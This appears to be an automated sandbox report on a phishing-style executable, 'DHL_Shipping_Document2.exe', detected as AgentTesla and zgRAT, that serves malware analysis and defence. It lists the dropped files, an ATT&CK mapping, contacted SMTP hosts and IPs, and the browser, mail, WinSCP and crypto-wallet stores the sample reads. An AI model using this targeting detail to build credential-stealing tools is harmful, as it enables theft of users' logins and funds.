                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DF6E0 GetUserNameW,15_2_022DF6E0

                  Stealing of Sensitive Information

                  barindex
                  Yara detected zgRAT
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPE
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: InstallUtil.exe, 00000011.00000002.550292879.00000294081A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: InstallUtil.exe, 00000011.00000002.550292879.00000294081A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected zgRAT
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPE
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation                  		11
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  Account Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  PowerShell                  		Boot or Logon Initialization Scripts11
                  Registry Run Keys / Startup Folder                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Credentials in Registry                  		1
                  File and Directory Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		Exfiltration Over Bluetooth11
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information                  		Security Account Manager114
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Masquerading                  		NTDS211
                  Security Software Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingData Transfer Size Limits23
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common311
                  Process Injection                  		Cached Domain Credentials131
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Hidden Files and Directories                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Owner/User Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  Remote System Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                  System Network Configuration Discovery                  		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830438 Sample: DHL_Shipping_Document2.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 46 us2.smtp.mailhostbox.com 2->46 48 smtp.thanhphoung-vn.com 2->48 50 203.215.12.0.in-addr.arpa 2->50 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 6 other signatures 2->74 8 DHL_Shipping_Document2.exe 1 8 2->8         started        12 KbWSe.exe 2->12         started        15 explorers.exe 2 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 38 C:\Users\user\AppData\Local\explorers.exe, PE32+ 8->38 dropped 40 C:\Users\...\Lutyzivrgpnlssvvvftlfile.exe, PE32 8->40 dropped 42 C:\Users\...\explorers.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\...\DHL_Shipping_Document2.exe.log, ASCII 8->44 dropped 86 Encrypted powershell cmdline option found 8->86 88 Creates multiple autostart registry keys 8->88 90 Writes to foreign memory regions 8->90 104 2 other signatures 8->104 19 Lutyzivrgpnlssvvvftlfile.exe 17 9 8->19         started        24 cmd.exe 1 8->24         started        26 powershell.exe 13 8->26         started        28 InstallUtil.exe 8->28         started        58 208.91.198.143, 49702, 49704, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->58 60 104.237.62.211, 443, 49700 WEBNXUS United States 12->60 66 4 other IPs or domains 12->66 92 Antivirus detection for dropped file 12->92 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->94 96 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->96 106 3 other signatures 12->106 98 Multi AV Scanner detection for dropped file 15->98 100 Machine Learning detection for dropped file 15->100 62 api4.ipify.org 17->62 64 api.ipify.org 17->64 102 Tries to harvest and steal browser information (history, passwords, etc) 17->102 file6 signatures7 process8 dnsIp9 52 208.91.199.225, 49699, 49703, 587 PUBLIC-DOMAIN-REGISTRYUS United States 19->52 54 api4.ipify.org 173.231.16.76, 443, 49697, 49701 WEBNXUS United States 19->54 56 4 other IPs or domains 19->56 36 C:\Users\user\AppData\Roaming\...\KbWSe.exe, PE32 19->36 dropped 76 Antivirus detection for dropped file 19->76 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->80 84 7 other signatures 19->84 82 Encrypted powershell cmdline option found 24->82 30 powershell.exe 15 24->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        file10 signatures11 process12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  DHL_Shipping_Document2.exe38%ReversingLabsWin64.Trojan.Leonem
                  DHL_Shipping_Document2.exe33%VirustotalBrowse
                  DHL_Shipping_Document2.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%AviraTR/Spy.Gen8
                  C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe100%AviraTR/Spy.Gen8
                  C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\explorers.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\explorers.exe38%ReversingLabsWin64.Trojan.Leonem

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  15.0.Lutyzivrgpnlssvvvftlfile.exe.a0000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                  17.2.InstallUtil.exe.400000.0.unpack100%AviraHEUR/AGEN.1235860Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  203.215.12.0.in-addr.arpa0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  https://urn.to/r/sds_see0%URL Reputationsafe
                  http://smtp.thanhphoung-vn.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  		208.91.199.223
                  		truefalse
                    		high
                    api4.ipify.org
                    		173.231.16.76
                    		truefalse
                      		high
                      smtp.thanhphoung-vn.com
                      		unknown
                      		unknownfalse
                        		unknown
                        203.215.12.0.in-addr.arpa
                        		unknown
                        		unknownfalseunknown
                        api.ipify.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.google.com/intl/en_uk/chrome/GoogleInstallUtil.exe, 00000011.00000002.552825754.0000029417EBF000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                              		high
                              https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                		high
                                https://duckduckgo.com/ac/?q=Xubyeworypu.tmpdb.17.drfalse
                                  		high
                                  https://stackoverflow.com/q/14436606/23354InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netJInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                        		high
                                        https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=cLfzmsuaggmw.tmpdb.17.drfalse
                                          		high
                                          http://us2.smtp.mailhostbox.comLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DAInstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                              		high
                                              https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleInstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://search.yahoo.com?fr=crmas_sfpfInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Xubyeworypu.tmpdb.17.drfalse
                                                      		high
                                                      https://www.newtonsoft.com/jsonexplorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://smtp.thanhphoung-vn.comLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023CC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                          		high
                                                          https://support.google.com/chrome?p=update_errorFixLfzmsuaggmw.tmpdb.17.drfalse
                                                            		high
                                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                              		high
                                                              https://support.google.com/chrome/answer/6315198?product=Lfzmsuaggmw.tmpdb.17.drfalse
                                                                		high
                                                                http://james.newtonking.com/projects/jsonDHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D72000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A029000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://support.google.com/installer/?product=Lfzmsuaggmw.tmpdb.17.drfalse
                                                                  		high
                                                                  https://support.google.com/chrome?p=update_error8InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=Xubyeworypu.tmpdb.17.drfalse
                                                                      		high
                                                                      https://search.yahoo.com?fr=crmas_sfpInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                                        		high
                                                                        https://www.google.com/intl/en_uk/chrome/8InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.ipify.orgLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/mgravell/protobuf-netiInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erroLfzmsuaggmw.tmpdb.17.drfalse
                                                                                		high
                                                                                https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsLfzmsuaggmw.tmpdb.17.drfalse
                                                                                  		high
                                                                                  https://stackoverflow.com/q/11564914/23354;InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stackoverflow.com/q/2152978/23354InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/intl/en_uk/chrome/Lfzmsuaggmw.tmpdb.17.drfalse
                                                                                        		high
                                                                                        https://www.newtonsoft.com/jsonschemaexplorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.codeplex.com/DotNetZipInstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.nuget.org/packages/Newtonsoft.Json.BsonDHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://urn.to/r/sds_seeDHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://support.google.com/chrome?p=update_errorInstallUtil.exe, 00000011.00000002.552825754.0000029417E9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417ED8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417DA1000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Xubyeworypu.tmpdb.17.drfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    208.91.198.143
                                                                                                    		unknownUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                    104.237.62.211
                                                                                                    		unknownUnited States
                                                                                                    		18450WEBNXUSfalse
                                                                                                    208.91.199.225
                                                                                                    		unknownUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                    208.91.199.223
                                                                                                    		us2.smtp.mailhostbox.comUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse
